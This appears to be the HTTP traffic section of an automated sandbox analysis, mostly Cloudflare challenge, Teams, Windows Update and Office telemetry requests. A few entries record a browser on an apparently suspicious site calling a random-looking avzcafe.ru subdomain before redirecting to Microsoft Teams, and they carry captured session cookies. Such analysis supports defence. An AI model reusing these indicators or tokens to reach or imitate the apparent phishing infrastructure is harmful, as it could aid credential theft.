Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: j9lg.xbyhiqbjl.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://j9lg.xbyhiqbjl.com/admi/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Im9VYzc1a0g4YUgxWVB3d1VaVWlzcWc9PSIsInZhbHVlIjoiSHhvRVRDS0pqMXdWUkJQQWxBV1lxNVpHTVI2OElsSGxZaVpiSnRlQm5Ld2ZoT081T21pcHRMSHBUc1llMURBRzdqTU9PTjFtcVFtVUFwaGlUckdhSU1aMVNkVDM2Zld0YmhTd0ZjY1ZSRWJsazZXVHpUZkl3SXJ0MHVZcEpTU2IiLCJtYWMiOiJmMjg4OTVlYmQ5YTJhNmU2ZTdhZTA3MDBlZjUxZDY3MzNjYmViODY0ZGIwZmMzODI2NmY3NDllZTY2MTVmODZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjVkV0tLL05uUzE1R0swN253RFFiOFE9PSIsInZhbHVlIjoiNWd6b0dsa0JRaUtscW54bHJyZWsrNDl1SEozS0JoenMrVHF6YjBQbEhoMVU4QlE1TlBGQ2lUZGM4cEZNQjRIQzlBR2E0QUkzeFJxN21LcnFXVXpNZ0xXTkxCalVzdmUrVzU5Z1psNGU4SXlLY3FMRXA0cE9pRkRYV3laaWtOQjkiLCJtYWMiOiJlY2ZiNGFmYzNmMDRhNzU2YjkwMjQzYTExNTQ4ZTg3ODdmODZkMGM4NDM4N2JkNmNhYTQyNzc0ZWY2NGM2YjE5IiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8ec5727f9d0241a1&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/487456068:1733246749:egPdjpMoJzfojSsctpNbepGP0MyEt9rjP3lowltZDOM/8ec5727f9d0241a1/xoj21sG.TgNYar2CTssEEZiD57H0pWQOKcnFFHsf_L0-1733248732-1.1.1.1-3806Ch6yrCyiGSADZ7Q5vE1UuMqEvbi58GgHh_28sc7_EOrCh7HNPU4l8oRObyeS HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8ec5727f9d0241a1/1733248736475/wS--9DjAkAOpF5i HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/wazli/0x4AAAAAAAzBGuy5s2mdElBv/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8ec5727f9d0241a1/1733248736475/wS--9DjAkAOpF5i HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8ec5727f9d0241a1/1733248736478/8f38335f91dcaf734a7afa50e0a6c4b356ef55c4227675c3a160e4125fdfceeb/CbLonmEmJfVGcCU HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/wazli/0x4AAAAAAAzBGuy5s2mdElBv/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/487456068:1733246749:egPdjpMoJzfojSsctpNbepGP0MyEt9rjP3lowltZDOM/8ec5727f9d0241a1/xoj21sG.TgNYar2CTssEEZiD57H0pWQOKcnFFHsf_L0-1733248732-1.1.1.1-3806Ch6yrCyiGSADZ7Q5vE1UuMqEvbi58GgHh_28sc7_EOrCh7HNPU4l8oRObyeS HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/487456068:1733246749:egPdjpMoJzfojSsctpNbepGP0MyEt9rjP3lowltZDOM/8ec5727f9d0241a1/xoj21sG.TgNYar2CTssEEZiD57H0pWQOKcnFFHsf_L0-1733248732-1.1.1.1-3806Ch6yrCyiGSADZ7Q5vE1UuMqEvbi58GgHh_28sc7_EOrCh7HNPU4l8oRObyeS HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /mjiglbhvzysujfpfwkvfxrkFvoJkmovXLGALCDMYWHBJHQVGUVBUWEEDSMN HTTP/1.1Host: 0rela6wr6r9khl50cbgjotcbwa8davihjy3a64rapf6i1hzopzenn.avzcafe.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://j9lg.xbyhiqbjl.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://j9lg.xbyhiqbjl.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: teams.microsoft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://j9lg.xbyhiqbjl.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /v2?clientexperience=t2 HTTP/1.1Host: teams.microsoft.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://j9lg.xbyhiqbjl.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: MUIDB=28C464D8E51F67EE36DA7192E47D666E
Source: global trafficHTTP traffic detected: GET /mjiglbhvzysujfpfwkvfxrkFvoJkmovXLGALCDMYWHBJHQVGUVBUWEEDSMN HTTP/1.1Host: 0rela6wr6r9khl50cbgjotcbwa8davihjy3a64rapf6i1hzopzenn.avzcafe.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /v2/?clientexperience=t2 HTTP/1.1Host: teams.microsoft.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://j9lg.xbyhiqbjl.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: MUIDB=28C464D8E51F67EE36DA7192E47D666E
Source: global trafficHTTP traffic detected: GET /v2/worker/precompiled-web-worker-7fb380386db128ff.js HTTP/1.1Host: teams.microsoft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://teams.microsoft.com/v2/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: MUIDB=28C464D8E51F67EE36DA7192E47D666E; clocale=en-us
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=dP4PbSHbpM+gPBT&MD=utld16HU HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /v2/worker/precompiled-web-worker-7fb380386db128ff.js HTTP/1.1Host: teams.microsoft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: MUIDB=28C464D8E51F67EE36DA7192E47D666E
Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
